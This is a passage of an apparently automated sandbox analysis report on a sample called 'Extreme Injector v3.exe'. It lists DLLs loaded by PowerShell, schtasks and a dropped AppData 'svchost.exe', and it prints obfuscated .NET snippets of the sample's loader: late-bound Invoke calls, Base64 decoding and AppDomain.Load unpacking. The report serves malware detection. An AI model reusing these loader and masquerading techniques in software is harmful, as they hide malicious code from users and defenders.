                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: svchost.lnk.0.drLNK file: ..\..\..\..\..\svchost.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Extreme Injector v3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Extreme Injector v3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.nedU5fdyNpDcvmN1ycO7iE7z0ubYY8eVFLmvVLnj6S0v0xV3Z43AScCvqvkpubxr5ZyfnjqfMIh0WuX0vwJoRh8,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.QCpaiZPibaDmqM5CawPMjJvddtD3lx3waxXELvPVRhA6URIEo02G2ci53J8DkAxGrRx5h6B60f8it0AhZJkdW6C,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.DtglmJNhJ8qL3gqvetVIACCzkIdUB1MbWXlY5gs8IinuS7YGlH4XQQbYMOzFrXR0JeagiTS7iNuBdmgdZEaYksn,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.EP7yJZ8EXHGN9NSEF6FHmi6DwvAR3PPmJDbNL6VzO4plUuN4EhidDPYCP2MIELPkPD8TQ3mh2P6mfTmfhIAJIHo,_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.xeQjpvOa1Azh2ni7YjQcwftWJb7Js()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VnRUpvzWzyDK5BlaMvtj7H5cMprwN[2],_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.Iy26tIhYzOYNZe964xRJ9hDeVF3im(Convert.FromBase64String(VnRUpvzWzyDK5BlaMvtj7H5cMprwN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.nedU5fdyNpDcvmN1ycO7iE7z0ubYY8eVFLmvVLnj6S0v0xV3Z43AScCvqvkpubxr5ZyfnjqfMIh0WuX0vwJoRh8,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.QCpaiZPibaDmqM5CawPMjJvddtD3lx3waxXELvPVRhA6URIEo02G2ci53J8DkAxGrRx5h6B60f8it0AhZJkdW6C,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.DtglmJNhJ8qL3gqvetVIACCzkIdUB1MbWXlY5gs8IinuS7YGlH4XQQbYMOzFrXR0JeagiTS7iNuBdmgdZEaYksn,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.EP7yJZ8EXHGN9NSEF6FHmi6DwvAR3PPmJDbNL6VzO4plUuN4EhidDPYCP2MIELPkPD8TQ3mh2P6mfTmfhIAJIHo,_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.xeQjpvOa1Azh2ni7YjQcwftWJb7Js()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VnRUpvzWzyDK5BlaMvtj7H5cMprwN[2],_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.Iy26tIhYzOYNZe964xRJ9hDeVF3im(Convert.FromBase64String(VnRUpvzWzyDK5BlaMvtj7H5cMprwN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.nedU5fdyNpDcvmN1ycO7iE7z0ubYY8eVFLmvVLnj6S0v0xV3Z43AScCvqvkpubxr5ZyfnjqfMIh0WuX0vwJoRh8,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.QCpaiZPibaDmqM5CawPMjJvddtD3lx3waxXELvPVRhA6URIEo02G2ci53J8DkAxGrRx5h6B60f8it0AhZJkdW6C,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.DtglmJNhJ8qL3gqvetVIACCzkIdUB1MbWXlY5gs8IinuS7YGlH4XQQbYMOzFrXR0JeagiTS7iNuBdmgdZEaYksn,nX7yGlLoZmzsN8AGvFlqlvEzgwliKsGGOfVF4bYyvbRdvFULKExWmj5Wm0SDIPRvxShN0ZsirFnlqrn0dnoQ39s.EP7yJZ8EXHGN9NSEF6FHmi6DwvAR3PPmJDbNL6VzO4plUuN4EhidDPYCP2MIELPkPD8TQ3mh2P6mfTmfhIAJIHo,_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.xeQjpvOa1Azh2ni7YjQcwftWJb7Js()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VnRUpvzWzyDK5BlaMvtj7H5cMprwN[2],_5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.Iy26tIhYzOYNZe964xRJ9hDeVF3im(Convert.FromBase64String(VnRUpvzWzyDK5BlaMvtj7H5cMprwN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      .NET source code contains potential unpacker
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: M33X6VISXUkeDPSGqsDK1LxRRzTq3 System.AppDomain.Load(byte[])
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV System.AppDomain.Load(byte[])
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: M33X6VISXUkeDPSGqsDK1LxRRzTq3 System.AppDomain.Load(byte[])
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV System.AppDomain.Load(byte[])
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: M33X6VISXUkeDPSGqsDK1LxRRzTq3 System.AppDomain.Load(byte[])
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV System.AppDomain.Load(byte[])
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs.Net Code: VgOnGMOR3ZxLXRq1WhXH2z9viZ7UV
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B77D2A5 pushad ; iretd 1_2_00007FFD9B77D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B890952 push E95A98D0h; ret 1_2_00007FFD9B8909C9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B962316 push 8B485F93h; iretd 1_2_00007FFD9B96231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B78D2A5 pushad ; iretd 4_2_00007FFD9B78D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B972316 push 8B485F92h; iretd 4_2_00007FFD9B97231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B77D2A5 pushad ; iretd 7_2_00007FFD9B77D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B89BA7D push E85AA2D7h; ret 7_2_00007FFD9B89BAF9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B962316 push 8B485F93h; iretd 7_2_00007FFD9B96231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77ECE0 push ebp; iretd 11_2_00007FFD9B77ECE1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77EDE0 push ebp; iretd 11_2_00007FFD9B77EDE1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77F160 push ebp; iretd 11_2_00007FFD9B77F161
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77F7E0 push ebp; iretd 11_2_00007FFD9B77F7E1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77FA60 push ebp; iretd 11_2_00007FFD9B77FA61
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77FDE0 push ebp; iretd 11_2_00007FFD9B77FDE1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77D4F0 push ebp; iretd 11_2_00007FFD9B77D4F1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77D170 push ebp; iretd 11_2_00007FFD9B77D171
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77D870 push ebp; iretd 11_2_00007FFD9B77D871
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77DBF0 push ebp; iretd 11_2_00007FFD9B77DBF1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77DF70 push ebp; iretd 11_2_00007FFD9B77DF71
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77E070 push ebp; iretd 11_2_00007FFD9B77E071
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77E3F0 push ebp; iretd 11_2_00007FFD9B77E3F1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77E770 push ebp; iretd 11_2_00007FFD9B77E771
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77EC00 push ebp; iretd 11_2_00007FFD9B77EC01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77F080 push ebp; iretd 11_2_00007FFD9B77F081
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77F400 push ebp; iretd 11_2_00007FFD9B77F401
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77F700 push ebp; iretd 11_2_00007FFD9B77F701
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77FD00 push ebp; iretd 11_2_00007FFD9B77FD01
